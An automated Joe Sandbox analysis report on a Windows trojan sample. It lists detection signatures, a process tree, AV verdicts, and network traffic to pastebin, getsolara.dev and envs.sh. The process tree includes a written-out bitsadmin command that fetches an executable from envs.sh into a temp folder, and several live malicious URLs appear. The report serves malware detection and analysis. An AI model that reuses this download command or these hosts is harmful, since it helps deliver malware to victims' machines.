Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
Analysis ID:1511791
MD5:7afabb528ce69e3a40dec6c3253ef854
SHA1:5161cc329e2fdda24218898bf637bb47a29daea2
SHA256:130b8c87664cf95a9fee611a0c14098a4da51f6b768260ad40a7d28ff895aaf0
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Parents
Tries to download files via bitsadmin
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe" MD5: 7AFABB528CE69E3A40DEC6C3253EF854)
    • mshta.exe (PID: 6472 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • bitsadmin.exe (PID: 3744 cmdline: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe MD5: F57A03FA0E654B393BB078D1C60695F3)
        • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BootstrapperV1.19.exe (PID: 6516 cmdline: "C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe" MD5: 90FD25CED85FE6DB28D21AE7D1F02E2C)
      • conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 7240 cmdline: C:\Windows\system32\WerFault.exe -u -p 6516 -s 2184 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 2708 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
\Device\ConDrvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      SourceRuleDescriptionAuthorStrings
      Process Memory Space: BootstrapperV1.19.exe PID: 6516JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        SourceRuleDescriptionAuthorStrings
        2.0.BootstrapperV1.19.exe.226e67e0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

          System Summary

          barindex
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe, CommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\bitsadmin.exe, NewProcessName: C:\Windows\SysWOW64\bitsadmin.exe, OriginalFileName: C:\Windows\SysWOW64\bitsadmin.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe, ProcessId: 3744, ProcessName: bitsadmin.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe, ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 3744, ParentProcessName: bitsadmin.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 3340, ProcessName: conhost.exe
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2708, ProcessName: svchost.exe
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeAvira: detected
          Source: https://getsolara.dev/Avira URL Cloud: Label: phishing
          Source: https://getsolara.dev/asset/discord.jsonAvira URL Cloud: Label: phishing
          Source: http://getsolara.devAvira URL Cloud: Label: phishing
          Source: https://getsolara.devAvira URL Cloud: Label: phishing
          Source: https://getsolara.dev/api/endpoint.jsonAvira URL Cloud: Label: phishing
          Source: https://getsolara.dev/SuspectedAvira URL Cloud: Label: phishing
          Source: https://getsolara.dev/XAvira URL Cloud: Label: phishing
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeAvira: detection malicious, Label: TR/Redcap.oczed
          Source: getsolara.devVirustotal: Detection: 11%Perma Link
          Source: https://getsolara.dev/Virustotal: Detection: 12%Perma Link
          Source: https://getsolara.dev/asset/discord.jsonVirustotal: Detection: 9%Perma Link
          Source: http://getsolara.devVirustotal: Detection: 11%Perma Link
          Source: https://getsolara.devVirustotal: Detection: 12%Perma Link
          Source: https://getsolara.dev/api/endpoint.jsonVirustotal: Detection: 9%Perma Link
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeReversingLabs: Detection: 75%
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeReversingLabs: Detection: 68%
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeVirustotal: Detection: 56%Perma Link
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Local\Temp\BITD1EE.tmpJoe Sandbox ML: detected
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeJoe Sandbox ML: detected
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 89.163.145.170:443 -> 192.168.2.4:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 128.116.119.3:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: System.Runtime.Serialization.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Xml.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.pdb 2 source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.ni.pdbRSDS source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268033F000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: System.Configuration.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.ni.pdbRSDSC source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Configuration.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Xml.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.pdb source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268033F000.00000004.00000800.00020000.00000000.sdmp, WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Xml.ni.pdbRSDS# source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Core.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Data.pdbH source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Numerics.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: mscorlib.pdb p source: WERE576.tmp.dmp.12.dr
          Source: Binary string: mscorlib.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: BootstrapperV1.19.exe, 00000002.00000002.2125161031.00000226E8E66000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Core.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Runtime.Serialization.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Numerics.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.ni.pdb source: WERE576.tmp.dmp.12.dr
          Source: Binary string: System.Core.ni.pdbRSDS source: WERE576.tmp.dmp.12.dr

          Networking

          barindex
          Source: unknownDNS query: name: pastebin.com
          Source: Yara matchFile source: 2.0.BootstrapperV1.19.exe.226e67e0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe, type: DROPPED
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getsolara.devConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/Host: getsolara.dev
          Source: global trafficHTTP traffic detected: GET /raw/pjseRvyK HTTP/1.1Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/Host: clientsettings.roblox.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/Host: www.nodejs.orgConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
          Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
          Source: Joe Sandbox ViewIP Address: 104.20.23.46 104.20.23.46
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: MYLOC-ASIPBackboneofmyLocmanagedITAGDE MYLOC-ASIPBackboneofmyLocmanagedITAGDE
          Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: getsolara.devConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/Host: getsolara.dev
          Source: global trafficHTTP traffic detected: GET /raw/pjseRvyK HTTP/1.1Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/Host: pastebin.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/Host: clientsettings.roblox.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=0-1119User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/Host: www.nodejs.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=1120-1323User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=1324-1593User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=1594-2051User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=2052-2183User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=2184-2710User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=2711-2883User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=2884-3472User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=3473-3901User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=3902-4187User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=4188-4386User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=4387-4410User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=4411-4758User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=4759-5147User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=5148-5320User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=5321-5474User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=5475-5557User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=5558-5714User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=5715-5997User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=5998-6078User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=6079-6087User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=6088-6168User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=6169-6250User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=6251-6394User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=6395-6623User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=6624-6716User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=6717-6852User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=6853-6880User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=6881-7029User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=7030-7122User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=7123-7371User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=7372-7600User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=7601-7780User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficHTTP traffic detected: GET /wUB.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMTRange: bytes=7781-7860User-Agent: Microsoft BITS/7.8Host: envs.sh
          Source: global trafficDNS traffic detected: DNS query: getsolara.dev
          Source: global trafficDNS traffic detected: DNS query: pastebin.com
          Source: global trafficDNS traffic detected: DNS query: envs.sh
          Source: global trafficDNS traffic detected: DNS query: clientsettings.roblox.com
          Source: global trafficDNS traffic detected: DNS query: www.nodejs.org
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463/rpc?v=1
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:64632
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientsettings.roblox.com
          Source: svchost.exe, 00000006.00000002.3116810997.00000230B3285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-term4-lhr2.roblox.com
          Source: svchost.exe, 00000006.00000003.1894883099.00000230B3168000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
          Source: edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: svchost.exe, 00000006.00000003.1894883099.00000230B3168000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: svchost.exe, 00000006.00000003.1894883099.00000230B3168000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: svchost.exe, 00000006.00000003.1894883099.00000230B319D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getsolara.dev
          Source: BootstrapperV1.19.exe.0.drString found in binary or memory: http://james.newtonking.com/projects/json
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268008B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Amcache.hve.12.drString found in binary or memory: http://upx.sf.net
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.nodejs.org
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com
